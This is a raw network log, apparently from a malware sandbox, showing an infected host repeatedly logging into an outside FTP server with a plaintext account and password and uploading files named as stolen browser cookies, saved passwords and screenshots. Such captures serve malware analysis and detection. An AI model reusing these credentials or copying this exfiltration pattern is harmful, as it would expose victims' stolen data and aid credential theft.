                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:42:26.554840088 CEST4971221192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:42:26.904500961 CEST2149712110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:42:26.943182945 CEST4971221192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:42:27.321655989 CEST2149712110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:42:27.661900043 CEST2149712110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:42:27.662194014 CEST4971221192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:42:28.006783962 CEST2149712110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:42:28.006975889 CEST4971221192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:42:28.360621929 CEST2149712110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:42:28.360764980 CEST4971221192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:28.715434074 CEST2149712110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,212,212)
                              Sep 25, 2024 14:42:28.723539114 CEST4971221192.168.2.9110.4.45.197STOR CO_Chrome_Default.txt_user-878411_2024_09_25_09_02_24.txt
                              Sep 25, 2024 14:42:29.608680964 CEST2149712110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:29.968885899 CEST2149712110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.359 seconds (measured here), 0.79 Kbytes per second
                              Sep 25, 2024 14:42:29.973295927 CEST4971221192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:30.320218086 CEST2149712110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,235,243)
                              Sep 25, 2024 14:42:30.328476906 CEST4971221192.168.2.9110.4.45.197STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_15_01_02.txt
                              Sep 25, 2024 14:42:31.384186983 CEST2149712110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:31.390208006 CEST2149712110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:31.635230064 CEST2149717110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 25 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 25 of 50 allowed.220-Local time is now 20:42. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 25 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 25 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 25 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:42:31.635566950 CEST4971721192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:42:31.731142998 CEST2149712110.4.45.197192.168.2.9226 File successfully transferred
                              Sep 25, 2024 14:42:31.731556892 CEST4971221192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:31.962534904 CEST2149717110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:42:31.963149071 CEST4971721192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:42:32.075933933 CEST2149712110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,218,21)
                              Sep 25, 2024 14:42:32.089035034 CEST4971221192.168.2.9110.4.45.197STOR CO_Firefox_3nxxd8pi.default-release.txt_user-878411_2024_09_25_17_29_42.txt
                              Sep 25, 2024 14:42:32.325310946 CEST2149717110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:42:32.652662992 CEST2149717110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:42:32.657428026 CEST4971721192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:42:32.911660910 CEST2149712110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:32.986711025 CEST2149717110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:42:32.986973047 CEST4971721192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:42:33.239876032 CEST2149712110.4.45.197192.168.2.9226 File successfully transferred
                              Sep 25, 2024 14:42:33.316895962 CEST2149717110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:42:33.449080944 CEST4971721192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:33.778009892 CEST2149717110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,226,153)
                              Sep 25, 2024 14:42:33.783690929 CEST4971721192.168.2.9110.4.45.197STOR PW_user-878411_2024_09_25_08_42_29.html
                              Sep 25, 2024 14:42:34.626370907 CEST2149717110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:35.034544945 CEST2149717110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.334 seconds (measured here), 1.01 Kbytes per second
                              Sep 25, 2024 14:42:35.070092916 CEST4971721192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:35.450246096 CEST2149717110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,247,57)
                              Sep 25, 2024 14:42:36.071222067 CEST4971721192.168.2.9110.4.45.197STOR CO_Chrome_Default.txt_user-878411_2024_09_25_14_11_25.txt
                              Sep 25, 2024 14:42:36.928812981 CEST2149717110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:37.270031929 CEST2149717110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.340 seconds (measured here), 0.83 Kbytes per second
                              Sep 25, 2024 14:42:37.270481110 CEST4971721192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:37.583060980 CEST2149723110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:42:37.583281040 CEST4972321192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:42:37.601094007 CEST2149717110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,223,0)
                              Sep 25, 2024 14:42:37.606585979 CEST4971721192.168.2.9110.4.45.197STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_16_20_15.txt
                              Sep 25, 2024 14:42:37.912306070 CEST2149723110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:42:37.912535906 CEST4972321192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:42:38.265619040 CEST2149723110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:42:38.431421041 CEST2149717110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:38.591711998 CEST2149723110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:42:38.592644930 CEST4972321192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:42:38.783453941 CEST2149717110.4.45.197192.168.2.9226 File successfully transferred
                              Sep 25, 2024 14:42:38.785008907 CEST4971721192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:38.938766003 CEST2149723110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:42:38.939066887 CEST4972321192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:42:39.112016916 CEST2149717110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,214,107)
                              Sep 25, 2024 14:42:39.124619007 CEST4971721192.168.2.9110.4.45.197STOR CO_Firefox_3nxxd8pi.default-release.txt_user-878411_2024_09_25_18_08_59.txt
                              Sep 25, 2024 14:42:39.267407894 CEST2149723110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:42:39.267564058 CEST4972321192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:39.594686031 CEST2149723110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,208,16)
                              Sep 25, 2024 14:42:39.600522995 CEST4972321192.168.2.9110.4.45.197STOR PW_user-878411_2024_09_25_08_42_35.html
                              Sep 25, 2024 14:42:39.956085920 CEST2149717110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:40.285213947 CEST2149717110.4.45.197192.168.2.9226 File successfully transferred
                              Sep 25, 2024 14:42:40.450242043 CEST2149723110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:40.790472984 CEST2149723110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.340 seconds (measured here), 0.99 Kbytes per second
                              Sep 25, 2024 14:42:40.825231075 CEST4972321192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:41.153971910 CEST2149723110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,219,125)
                              Sep 25, 2024 14:42:41.208826065 CEST4972321192.168.2.9110.4.45.197STOR CO_Chrome_Default.txt_user-878411_2024_09_25_14_21_28.txt
                              Sep 25, 2024 14:42:42.020953894 CEST2149723110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:42.350935936 CEST2149723110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.330 seconds (measured here), 0.86 Kbytes per second
                              Sep 25, 2024 14:42:42.351356030 CEST4972321192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:42.679596901 CEST2149723110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,254,20)
                              Sep 25, 2024 14:42:42.685287952 CEST4972321192.168.2.9110.4.45.197STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_16_10_37.txt
                              Sep 25, 2024 14:42:43.585841894 CEST2149723110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:45.758148909 CEST2155430110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 23 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:42:45.762273073 CEST5543021192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:42:46.101133108 CEST2155430110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:42:46.104639053 CEST5543021192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:42:46.459978104 CEST2155430110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:42:46.799571037 CEST2155430110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:42:46.804580927 CEST5543021192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:42:47.144850016 CEST2155430110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:42:47.145196915 CEST5543021192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:42:47.487152100 CEST2155430110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:42:47.487413883 CEST5543021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:47.994132996 CEST2155430110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,213,11)
                              Sep 25, 2024 14:42:48.223854065 CEST2155430110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,213,11)
                              Sep 25, 2024 14:42:48.225577116 CEST5543021192.168.2.9110.4.45.197STOR PW_user-878411_2024_09_25_08_42_43.html
                              Sep 25, 2024 14:42:49.076314926 CEST2155430110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:49.412595034 CEST2155430110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.335 seconds (measured here), 1.00 Kbytes per second
                              Sep 25, 2024 14:42:49.474122047 CEST5543021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:49.805684090 CEST2155430110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,237,107)
                              Sep 25, 2024 14:42:49.817501068 CEST5543021192.168.2.9110.4.45.197STOR CO_Chrome_Default.txt_user-878411_2024_09_25_14_51_24.txt
                              Sep 25, 2024 14:42:50.657113075 CEST2155430110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:50.996732950 CEST2155430110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.356 seconds (measured here), 0.79 Kbytes per second
                              Sep 25, 2024 14:42:50.997369051 CEST5543021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:51.330818892 CEST2155430110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,235,45)
                              Sep 25, 2024 14:42:51.336488008 CEST5543021192.168.2.9110.4.45.197STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_16_50_22.txt
                              Sep 25, 2024 14:42:52.186347008 CEST2155430110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:52.600034952 CEST2155430110.4.45.197192.168.2.9226 File successfully transferred
                              Sep 25, 2024 14:42:52.600404978 CEST5543021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:42:52.978665113 CEST2155430110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,198,13)
                              Sep 25, 2024 14:42:53.001554966 CEST5543021192.168.2.9110.4.45.197STOR CO_Firefox_3nxxd8pi.default-release.txt_user-878411_2024_09_25_18_49_01.txt
                              Sep 25, 2024 14:42:53.906737089 CEST2155430110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:42:54.273318052 CEST2155430110.4.45.197192.168.2.9226 File successfully transferred
                              Sep 25, 2024 14:44:24.828048944 CEST2165029110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:44. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:44. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 18 of 50 allowed.220-Local time is now 20:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:44:24.831254959 CEST6502921192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:44:25.193777084 CEST2165029110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:44:25.199153900 CEST6502921192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:44:25.588510990 CEST2165029110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:44:26.016300917 CEST2165029110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:44:26.016527891 CEST6502921192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:44:26.393462896 CEST2165029110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:44:26.395428896 CEST6502921192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:44:26.607925892 CEST2165030110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:44. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:44. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 50 allowed.220-Local time is now 20:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:44:26.611191988 CEST6503021192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:44:26.777072906 CEST2165029110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:44:26.777359962 CEST6502921192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:44:27.000193119 CEST2165030110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:44:27.000380993 CEST6503021192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:44:27.156686068 CEST2165029110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,200,37)
                              Sep 25, 2024 14:44:27.169186115 CEST6502921192.168.2.9110.4.45.197STOR SC_user-878411_2024_10_27_13_24_39.jpeg
                              Sep 25, 2024 14:44:27.466305971 CEST2165030110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:44:27.876199961 CEST2165030110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:44:27.876458883 CEST6503021192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:44:28.077284098 CEST2165030110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:44:28.106301069 CEST2165029110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:44:28.407121897 CEST2165030110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:44:28.407294989 CEST6503021192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:44:28.742332935 CEST2165030110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:44:28.745111942 CEST6503021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:44:28.917994022 CEST2165029110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.811 seconds (measured here), 91.01 Kbytes per second
                              Sep 25, 2024 14:44:29.085597038 CEST2165030110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,249,65)
                              Sep 25, 2024 14:44:29.093226910 CEST6503021192.168.2.9110.4.45.197STOR SC_user-878411_2024_10_16_12_49_55.jpeg
                              Sep 25, 2024 14:44:30.056008101 CEST2165030110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:44:31.057775021 CEST2165030110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 1.001 seconds (measured here), 73.73 Kbytes per second
                              Sep 25, 2024 14:44:32.194961071 CEST6502921192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:44:32.538887978 CEST2165029110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,231,190)
                              Sep 25, 2024 14:44:32.547243118 CEST6502921192.168.2.9110.4.45.197STOR SC_user-878411_2024_11_06_15_11_41.jpeg
                              Sep 25, 2024 14:44:33.451342106 CEST2165029110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:44:34.383814096 CEST2165029110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.932 seconds (measured here), 79.19 Kbytes per second
                              Sep 25, 2024 14:45:22.031651020 CEST2165040110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.031836033 CEST6504021192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:45:22.031975031 CEST2165040110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.032416105 CEST2165040110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.420850992 CEST2165040110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 20:45. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.421000957 CEST6504021192.168.2.9110.4.45.197USER origin@haliza.com.my
                              Sep 25, 2024 14:45:22.746551991 CEST2165040110.4.45.197192.168.2.9331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:45:22.747558117 CEST6504021192.168.2.9110.4.45.197PASS JesusChrist007$
                              Sep 25, 2024 14:45:23.947084904 CEST2165040110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:23.947805882 CEST2165040110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:23.948149920 CEST2165040110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:24.988107920 CEST2165040110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:24.989223003 CEST2165040110.4.45.197192.168.2.9230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:25.317061901 CEST2165040110.4.45.197192.168.2.9504 Unknown command
                              Sep 25, 2024 14:45:25.317339897 CEST6504021192.168.2.9110.4.45.197PWD
                              Sep 25, 2024 14:45:26.487792969 CEST2165040110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:45:26.488765955 CEST2165040110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:45:26.488816023 CEST6504021192.168.2.9110.4.45.197TYPE I
                              Sep 25, 2024 14:45:26.488945961 CEST2165040110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:45:26.720679998 CEST2165040110.4.45.197192.168.2.9257 "/" is your current location
                              Sep 25, 2024 14:45:27.044569969 CEST2165040110.4.45.197192.168.2.9200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:45:27.045316935 CEST6504021192.168.2.9110.4.45.197PASV
                              Sep 25, 2024 14:45:28.273814917 CEST2165040110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.274068117 CEST2165040110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.274665117 CEST2165040110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.275059938 CEST2165040110.4.45.197192.168.2.9227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.299405098 CEST6504021192.168.2.9110.4.45.197STOR SC_user-878411_2024_11_16_06_41_22.jpeg
                              Sep 25, 2024 14:45:29.132098913 CEST2165040110.4.45.197192.168.2.9150 Accepted data connection
                              Sep 25, 2024 14:45:29.942749023 CEST2165040110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:30.982853889 CEST2165040110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:30.983236074 CEST2165040110.4.45.197192.168.2.9226-File successfully transferred
                              226-File successfully transferred226 0.811 seconds (measured here), 91.04 Kbytes per second
